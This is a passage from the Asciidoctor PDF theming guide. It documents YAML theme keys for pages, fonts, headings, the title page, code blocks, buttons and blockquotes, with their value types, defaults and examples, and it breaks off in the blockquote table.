custom font:\n\n[source,yaml]\n----\nbase:\n font-family: Roboto\n----\n\nThat's it!\nNow you're covered.\nIf your custom TTF font is missing a glyph, Asciidoctor PDF will look in your fallback font.\nYou don't need to reference the fallback font anywhere else in your theme file.\n\n== Keys\n\nThis section lists all the keys that are available when creating a custom theme.\nThe keys are organized by category.\nEach category represents a common prefix under which the keys are typically nested.\n\nTIP: Keys can be nested wherever an underscore (`_`) or hyphen (`-`) appears in the name.\nThis nested structure is for organizational purposes only.\nAll keys are flatted when the theme is loaded (e.g., `align` nested under `base` becomes `base-align`).\n\nThe converter uses the values of these keys to control how most elements are arranged and styled in the PDF.\nThe default values listed in this section get inherited from the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/base-theme.yml[base theme].\n\nIMPORTANT: The https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default theme] has a different set of values which are not shown in this guide.\n\nWhen creating a theme, all keys are optional.\nRequired keys are provided by the base theme.\nTherefore, you only have to declare keys that you want to override.\n\n[#keys-extends]\n=== Extends\n\nA theme can extend another theme using the `extends` key.\nFor example:\n\n[source,yaml]\n----\nextends: default\nbase:\n font-color: #ff0000\n----\n\nThe extends key accepts either a single value or an array of values.\nEach value is interpreted as a filename.\nIf the filename equals `default`, it resolves to the location of the default (built-in) theme.\nIf the filename is absolute, it's used as is.\nIf the filename begins with `.\/`, it's resolved as a theme file relative to the current theme file.\nOtherwise, the filename is resolved as a theme file in the normal way (relative to the value of the `pdf-themesdir` attribute).\n\nCurrently, the base theme is always loaded first.\nThen, the files referenced by the extends key are loaded in order.\nFinally, the keys in the current file are loaded.\nEach time a theme is loaded, the keys are overlaid onto the keys from the previous theme.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n|extends\n|String or Array\n(default: [])\n|extends:\n- default\n- .\/brand-theme.yml\n|===\n\n[#keys-role]\n=== Role\n\nThe keys in the `role` category define custom roles for formatting.\nThe name of the role is the first subkey level.\nThe role name may not contain a hyphen or underscore.\nThe keys under the role are the concrete theming properties.\n\nHere's an example of a role for making text red:\n\n[source,yaml]\n----\nrole:\n red:\n font-color: #ff0000\n----\n\nThis role can be used as follows:\n\n[source,asciidoc]\n----\nError text is shown in [.red]#red#.\n----\n\nCurrently, custom roles only apply to inline phrases and only support changing the font properties.\n\nThe converter provides several predefined roles.\nThe `big` and `small` roles map the font size to the $base_font_size_large and $base_font_size_small values, respectively.\nThese two roles can be redefined.\nThe `underline` and `line-through` roles add the underline and strikethrough decorations, respectively.\nThese two roles _can't_ be redefined.\nThe color roles (e.g., `blue`), which you may be familiar with from the HTML converter, are not mapped by default.\nYou'll 
need to define these in your theme if you'd like to make use of them when converting to PDF.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-role]*Key Prefix:* <<key-prefix-role,role-<name> >>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|role:\n red:\n font-color: #ff0000\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|role:\n label:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|role:\n large:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|role:\n heavy:\n font-style: bold\n|===\n\n[#keys-page]\n=== Page\n\nThe keys in this category control the size, margins and background of each page (i.e., canvas).\nWe recommended that you define this category before all other categories.\n\nNOTE: The background of the title page can be styled independently.\nSee <<Title Page>> for details.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-page]*Key Prefix:* <<key-prefix-page,page>>\n\n|background-color^[1]^\n|<<colors,Color>> +\n(default: #ffffff)\n|page:\n background-color: #fefefe\n\n|background-image^[1]^\n|image macro^[2]^ +\n(default: _not set_)\n|page:\n background-image: image:page-bg.png[]\n\n|background-image-(recto{vbar}verso)^[1]^\n|image macro^[2]^ +\n(default: _not set_)\n|page:\n background-image:\n recto: image:page-bg-recto.png[]\n verso: image:page-bg-verso.png[]\n\n|layout\n|portrait {vbar} landscape +\n(default: portrait)\n|page:\n layout: landscape\n\n|margin\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 36)\n|page:\n margin: [0.5in, 0.67in, 1in, 0.67in]\n\n|margin-inner^[3]^\n|<<measurement-units,Measurement>> +\n(default: 48)\n|page:\n margin-inner: 0.75in\n\n|margin-outer^[3]^\n|<<measurement-units,Measurement>> +\n(default: 24)\n|page:\n margin-outer: 0.59in\n\n|size\n|https:\/\/github.com\/prawnpdf\/pdf-core\/blob\/0.6.0\/lib\/pdf\/core\/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width,height]>> +\n(default: A4)\n|page:\n size: Letter\n\n|numbering-start-at\n|title {vbar} toc {vbar} body +\n(default: body)\n|page:\n numbering-start-at: toc\n|===\n\n. By default, page background images are automatically scaled to fit the bounds of the page (i.e., `fit=contain`).\nThe size of the background can be controlled using any of the sizing attributes on the image macro (i.e., fit, pdfwidth, scaledwidth, or width).\nIf the recto (right-hand, odd-numbered pages) or verso (left-hand, even-numbered pages) background is specified, it will be used only for that side.\nIf you flatten out the keys (e.g., `page-background-recto`), you can also set the default page background image (`page-background`), which will then be used as a fallback if a background image isn't specified for a side.\nTo disable the background for a side, use the value `none`.\n. Target may be an absolute path or a path relative to the value of the `pdf-themesdir` attribute.\n. 
The margins for `recto` (right-hand, odd-numbered) and `verso` (left-hand, even-numbered) pages are calculated automatically from the margin-inner and margin-outer values.\nThese margins and used when the value `prepress` is assigned to the `media` document attribute.\n\n[#keys-base]\n=== Base\n\nThe keys in this category provide generic theme settings and are often referenced throughout the theme file as variables.\nWe recommended that you define this category after the page category and before all other categories.\n\nNOTE: While it's common to define additional keys in this category (e.g., `base-border-radius`) to keep your theme DRY, we recommend using <<Custom Variables,custom variables>> instead.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-base]*Key Prefix:* <<key-prefix-base,base>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: left)\n|base:\n align: justify\n\n|border-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|base:\n border-color: #eeeeee\n\n\/\/ border-radius is variable, not an official key\n\/\/|border-radius\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ border-radius: 4\n\n|border-width\n|<<values,Number>> +\n(default: 0.5)\n|base:\n border-width: 0.5\n\n|font-color\n|<<colors,Color>> +\n(default: #000000)\n|base:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Helvetica)\n|base:\n font-family: Noto Serif\n\n|font-kerning\n|normal {vbar} default +\n(default: normal)\n|base:\n font-kerning: none\n\n|font-size\n|<<values,Number>> +\n(default: 12)\n|base:\n font-size: 10.5\n\n\/\/ font-size-large is a variable, not an official key\n\/\/|font-size-large\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ font-size-large: 13\n\n|font-size-min\n|<<values,Number>> +\n(default: 9)\n|base:\n font-size-min: 6\n\n\/\/ font-size-small is a variable, not an official key\n\/\/|font-size-small\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ font-size-small: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: normal)\n|base:\n font-style: normal\n\n|text-transform^[1]^\n|none +\n(default: none)\n|base:\n text-transform: none\n\n|line-height-length^[2]^\n|<<values,Number>> +\n(default: _not set_)\n|base:\n line-height-length: 12\n\n|line-height^[2]^\n|<<values,Number>> +\n(default: 1.15)\n|base:\n line-height: >\n $base-line-height-length \/\n $base-font-size\n|===\n\n. The `text-transform` key cannot be set globally.\nTherefore, this key should not be used.\nThe value of `none` is implicit and is documented here for completeness.\n. 
The `line-height-length` is a pseudo property that's local the theme.\nIt's often used for computing the `base-line-height` from the base font size and the desired line height size.\nFor instance, if you set `base-line-height-length`, you can use `$base-line-height-length \/ $base-font-size` to set the value of `base-line-height`.\n\n[#keys-vertical-spacing]\n=== Vertical Spacing\n\nThe keys in this category control the general spacing between elements where a more specific setting is not designated.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n|vertical-spacing\n|<<values,Number>> +\n(default: 12)\n|vertical-spacing: 10\n|===\n\n[#keys-link]\n=== Link\n\nThe keys in this category are used to style hyperlink text.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-link]*Key Prefix:* <<key-prefix-link,link>>\n\n|font-color\n|<<colors,Color>> +\n(default: #0000ee)\n|link:\n font-color: #428bca\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|link:\n font-family: Roboto\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|link:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|link:\n font-style: italic\n\n|text-decoration\n|none {vbar} underline {vbar} line-through +\n(default: none)\n|link:\n text-decoration: underline\n|===\n\n[#keys-literal]\n=== (Inline) Literal\n\nThe keys in this category are used for inline monospaced text in prose and table cells.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-literal]*Key Prefix:* <<key-prefix-literal,literal>>\n\n|background-color\n|<<colors,Color>> +\n(default: _not set_)\n|literal:\n background-color: #f5f5f5\n\n|border-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|literal:\n border-color: #cccccc\n\n|border-offset^[2]^\n|<<values,Number>> +\n(default: 0)\n|literal:\n border-offset: 2\n\n|border-radius\n|<<values,Number>> +\n(default: _not set_)\n|literal:\n border-radius: 3\n\n|border-width\n|<<values,Number>> +\n(default: $base-border-width)\n|literal:\n border-width: 0.5\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|literal:\n font-color: #b12146\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|literal:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|literal:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|literal:\n font-style: bold\n|===\n. The border is only used if a border color is specified and the border width is not explicitly set to 0.\nThe border only works properly if the literal phrase does not have nested formatting.\nOtherwise, the border will be inherited, producing a less than desirable result.\n. 
The border offset is the amount that the background and border swells around the text.\nIt does not affect the distance between the formatted phrase and the phrases that surround it.\n\n[#keys-heading]\n=== Heading\n\nThe keys in this category control the style of most headings, including part titles, chapter titles, sections titles, the table of contents title and discrete headings.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-heading]*Key Prefix:* <<key-prefix-heading,heading>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $base-align)\n|heading:\n align: center\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|heading:\n font-color: #222222\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $base-font-family)\n|heading:\n font-family: Noto Serif\n\n\/\/ NOTE: heading-font-size is overridden by h<n>-font-size in base theme\n\/\/|font-size\n\/\/|<<values,Number>> +\n\/\/(default: $base-font-size)\n\/\/|heading:\n\/\/ font-size: 18\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|heading:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|heading:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.15)\n|heading:\n line-height: 1.2\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 4)\n|heading:\n margin-top: $vertical-spacing * 0.2\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|heading:\n margin-bottom: 9.6\n\n3+|[#key-prefix-heading-level]*Key Prefix:* <<key-prefix-heading-level,heading-h<n> >>^[1]^\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $heading-align)\n|heading:\n h2-align: center\n\n|font-color\n|<<colors,Color>> +\n(default: $heading-font-color)\n|heading:\n h2-font-color: [0, 99%, 100%, 0]\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $heading-font-family)\n|heading:\n h4-font-family: Roboto\n\n|font-size^[1]^\n|<<values,Number>> +\n(default: <1>=24; <2>=18; <3>=16; <4>=14; <5>=12; <6>=10)\n|heading:\n h6-font-size: $base-font-size * 1.7\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $heading-font-style)\n|heading:\n h3-font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $heading-text-transform)\n|heading:\n text-transform: lowercase\n|===\n\n. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.\n. 
A font size is assigned to each heading level by the base theme.\nIf you want the font size of a specific level to be inherited, you must assign the value `null` (or `~` for short).\n\n[#keys-title-page]\n=== Title Page\n\nThe keys in this category control the style of the title page as well as the arrangement and style of the elements on it.\n\nTIP: The title page can be disabled from the document by setting the `notitle` attribute in the AsciiDoc document header.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-title-page]*Key Prefix:* <<key-prefix-title-page,title-page>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|title-page:\n align: right\n\n|background-color^[1]^\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n background-color: #eaeaea\n\n|background-image^[1]^\n|image macro^[2]^ +\n(default: _not set_)\n|title-page:\n background-image: image:title.png[]\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|title-page:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.15)\n|title-page:\n line-height: 1\n\n3+|[#key-prefix-title-page-logo]*Key Prefix:* <<key-prefix-title-page-logo,title-page-logo>>\n\n|align\n|<<image-alignments,Image alignment>> +\n(default: _inherit_)\n|title-page:\n logo:\n align: right\n\n|image\n|image macro^[2]^ +\n(default: _not set_)\n|title-page:\n logo:\n image: image:logo.png[pdfwidth=25%]\n\n|top\n|Percentage^[3]^ +\n(default: 10%)\n|title-page:\n logo:\n top: 25%\n\n3+|[#key-prefix-title-page-title]*Key Prefix:* <<key-prefix-title-page-title,title-page-title>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n title:\n font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n title:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: 18)\n|title-page:\n title:\n font-size: $heading-h1-font-size\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n title:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n title:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: $heading-line-height)\n|title-page:\n title:\n line-height: 0.9\n\n|top\n|Percentage^[3]^ +\n(default: 40%)\n|title-page:\n title:\n top: 55%\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n title:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n title:\n margin-bottom: 5\n\n3+|[#key-prefix-title-page-subtitle]*Key Prefix:* <<key-prefix-title-page-subtitle,title-page-subtitle>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n subtitle:\n font-color: #181818\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n subtitle:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: 14)\n|title-page:\n subtitle:\n font-size: $heading-h3-font-size\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n 
subtitle:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n subtitle:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: $heading-line-height)\n|title-page:\n subtitle:\n line-height: 1\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n subtitle:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n subtitle:\n margin-bottom: 5\n\n3+|[#key-prefix-authors]*Key Prefix:* <<key-prefix-authors,title-page-authors>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title-page:\n authors:\n delimiter: '; '\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-color: #181818\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n authors:\n text-transform: uppercase\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 12)\n|title-page:\n authors:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n authors:\n margin-bottom: 5\n\n3+|[#key-prefix-revision]*Key Prefix:* <<key-prefix-revision,title-page-revision>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title-page:\n revision:\n delimiter: ': '\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-color: #181818\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-size: $base-font-size-small\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n revision:\n text-transform: uppercase\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n revision:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n revision:\n margin-bottom: 5\n|===\n\n. By default, page background images are automatically scaled to fit the bounds of the page (i.e., `fit=contain`).\nThe size of the background can be controlled using any of the sizing attributes on the image macro (i.e., fit, pdfwidth, scaledwidth, or width).\n. Target may be an absolute path or a path relative to the value of the `pdf-themesdir` attribute.\n. 
Percentage unit can be % (relative to content height) or vh (relative to page height).\n\n[#keys-prose]\n=== Prose\n\nThe keys in this category control the spacing around paragraphs (paragraph blocks, paragraph content of a block, and other prose content).\nTypically, all the margin is placed on the bottom.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-prose]*Key Prefix:* <<key-prefix-prose,prose>>\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|prose:\n margin-top: 0\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|prose:\n margin-bottom: $vertical-spacing\n\n|margin-inner^[1]^\n|<<measurement-units,Measurement>> +\n(default: $prose-margin-bottom)\n|prose:\n margin-inner: 0\n\n|text-indent\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|prose:\n text-indent: 18\n|===\n\n. Controls the margin between adjacent paragraphs.\nUseful when using indented paragraphs.\n\n[#keys-block]\n=== Block\n\nThe keys in this category control the spacing around block elements when a more specific setting is not designated.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-block]*Key Prefix:* <<key-prefix-block,block>>\n\n\/\/|padding\n\/\/|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n\/\/|block:\n\/\/ padding: [12, 15, 12, 15]\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|block:\n margin-top: 6\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|block:\n margin-bottom: 6\n|===\n\nBlock styles are applied to the following block types:\n\n[cols=\"3*a\",grid=none,frame=none]\n|===\n|\n* admonition\n* example\n* quote\n|\n* verse\n* sidebar\n* image\n|\n* listing\n* literal\n* table\n|===\n\n[#keys-caption]\n=== Caption\n\nThe keys in this category control the arrangement and style of block captions.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-caption]*Key Prefix:* <<key-prefix-caption,caption>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: left)\n|caption:\n align: left\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|caption:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|caption:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|caption:\n font-size: 11\n\n|font-style\n|<<font-styles,Font style>> +\n(default: italic)\n|caption:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|caption:\n text-transform: uppercase\n\n|margin-inside\n|<<measurement-units,Measurement>> +\n(default: 4)\n|caption:\n margin-inside: 3\n\n|margin-outside\n|<<measurement-units,Measurement>> +\n(default: 0)\n|caption:\n margin-outside: 0\n|===\n\n[#keys-code]\n=== Code\n\nThe keys in this category are used to control the style of literal, listing and source blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-code]*Key Prefix:* <<key-prefix-code,code>>\n\n|background-color\n|<<colors,Color>> +\n(default: _not set_)\n|code:\n background-color: #f5f5f5\n\n|border-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|code:\n border-color: #cccccc\n\n|border-radius\n|<<values,Number>> +\n(default: _not set_)\n|code:\n border-radius: 4\n\n|border-width\n|<<values,Number>> +\n(default: 0.5)\n|code:\n border-width: 0.75\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|code:\n font-color: 
#333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|code:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: 10.8)\n|code:\n font-size: 11\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|code:\n font-style: italic\n\n|line-height\n|<<values,Number>> +\n(default: 1.2)\n|code:\n line-height: 1.25\n\n|line-gap^[1]^\n|<<values,Number>> +\n(default: 0)\n|code:\n line-gap: 3.8\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 9)\n|code:\n padding: 11\n\n3+|[#key-prefix-table-cell]*Key Prefix:* <<key-prefix-code-linenum,code-linenum>>^[2]^\n\n|font-color\n|<<colors,Color>> +\n(default: #999999)\n|code:\n linenum-font-color: #ccc\n|===\n. The line-gap property is used to tune the height of the background color applied to a span of block text highlighted using Rouge.\n. The code-linenum category only applies when using Pygments as the source highlighter.\nOtherwise, the style is controlled by the source highlighter theme.\n\n[#keys-callout-numbers]\n=== Callout Numbers\n\nThe keys in this category are used to control the style of callout numbers (i.e., conums) inside verbatim blocks and in callout lists (colists).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-conum]*Key Prefix:* <<key-prefix-conum,conum>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|conum:\n font-color: #b12146\n\n|font-family^[1,2]^\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|conum:\n font-family: M+ 1mn\n\n|font-size^[2]^\n|<<values,Number>> +\n(default: _inherit_)\n|conum:\n font-size: $base-font-size\n\n|font-style^[2]^\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|conum:\n font-style: normal\n\n|line-height^[2]^\n|<<values,Number>> +\n(default: 1.15)\n|conum:\n line-height: 4 \/ 3\n\n|glyphs^[2]^\n|circled {vbar} filled {vbar} Unicode String ranges +\n(default: circled)\n|conum:\n glyphs: \\u0031-\\u0039\n|===\n\n. Currently, the font must contain the circle numbers starting at glyph U+2460.\n. font-family, font-size, font-style, and line-height are only used for markers in a colist.\nThese properties are inherited for conums inside a verbatim block.\n. 
The font must provide the required glyphs.\nThe glyphs can be specified as a comma-separated list of ranges, where the range values are Unicode numbers (e.g., \\u2460).\n\n[#keys-button]\n=== Button\n\nThe keys in this category apply to a button reference (generated from the inline button macro).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-button]*Key Prefix:* <<key-prefix-button,button>>\n\n|background-color\n|<<colors,Color>> +\n(default: _not set_)\n|button:\n background-color: #0000ff\n\n|border-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|button:\n border-color: #cccccc\n\n|border-offset^[2]^\n|<<values,Number>> +\n(default: 0)\n|button:\n border-offset: 1.5\n\n|border-radius\n|<<values,Number>> +\n(default: 0)\n|button:\n border-radius: 2\n\n|border-width\n|<<values,Number>> +\n(default: $base-border-width)\n|button:\n border-width: 0.5\n\n|content^[3]^\n|<<quoted-string,Quoted string>> +\n(default: \"%s\")\n|button:\n content: \"[\\u2009%s\\u2009]\"\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|button:\n font-color: #ffffff\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|button:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|button:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|button:\n font-style: normal\n|===\n. The border is only used if a border color is specified and the border width is not explicitly set to 0.\n. The border offset is the amount that the background and border swells around the text.\nIt does not affect the distance between the formatted phrase and the phrases that surround it.\n. The character sequence `%s` in the content key gets replaced with the button label.\n\n[#keys-key]\n=== Key\n\nThe keys in this category apply to a key reference (generated from the inline kbd macro).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-key]*Key Prefix:* <<key-prefix-key,key>>\n\n|background-color\n|<<colors,Color>> +\n(default: _not set_)\n|key:\n background-color: #fafafa\n\n|border-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|key:\n border-color: #cccccc\n\n|border-offset^[2]^\n|<<values,Number>> +\n(default: 0)\n|key:\n border-offset: 1.5\n\n|border-radius\n|<<values,Number>> +\n(default: 0)\n|key:\n border-radius: 2\n\n|border-width\n|<<values,Number>> +\n(default: $base-border-width)\n|key:\n border-width: 0.375\n\n|separator^[3]^\n|<<quoted-string,Quoted string>> +\n(default: \"+\")\n|key:\n separator: \"\\u2009+\\u2009\"\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|key:\n font-color: #000\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|key:\n font-family: $base-font-family\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|key:\n font-size: 10.5\n\n|font-style\n|<<font-styles,Font style>> +\n(default: italic)\n|key:\n font-style: normal\n|===\n. The border is only used if a border color is specified and the border width is not explicitly set to 0.\n. The border offset is the amount that the background and border swells around the text.\nIt does not affect the distance between the formatted phrase and the phrases that surround it.\n. 
The separator is only used for multi-key sequences.\n\n[#keys-menu]\n=== Menu\n\nThe keys in this category apply to the menu label (generated from the inline menu macro).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-menu]*Key Prefix:* <<key-prefix-menu,menu>>\n\n|caret-content\n|<<quoted-string,Quoted string>> +\n(default: \" \\u203a \")\n|menu:\n caret-content: ' > '\n|===\n\n[#keys-blockquote]\n=== Blockquote\n\nThe keys in this category control the arrangement and style of quote blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-blockquote]*Key Prefix:* <<key-prefix-blockquote,blockquote>>\n\n|border-width^[1]^\n|<<values,Number>> +\n(default: 4)\n|blockquote:\n border-width: 5\n\n|border-color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|blockquote:\n border-color: #eeeeee\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n text-transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [6, 12, -6, 14])\n|blockquote:\n padding: [5, 10, -5, 12]\n\n3+|[#key-prefix-blockquote-cite]*Key Prefix:* <<key-prefix-blockquote-cite,blockquote-cite>>\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-size: 9\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-family: Noto Serif\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-style: 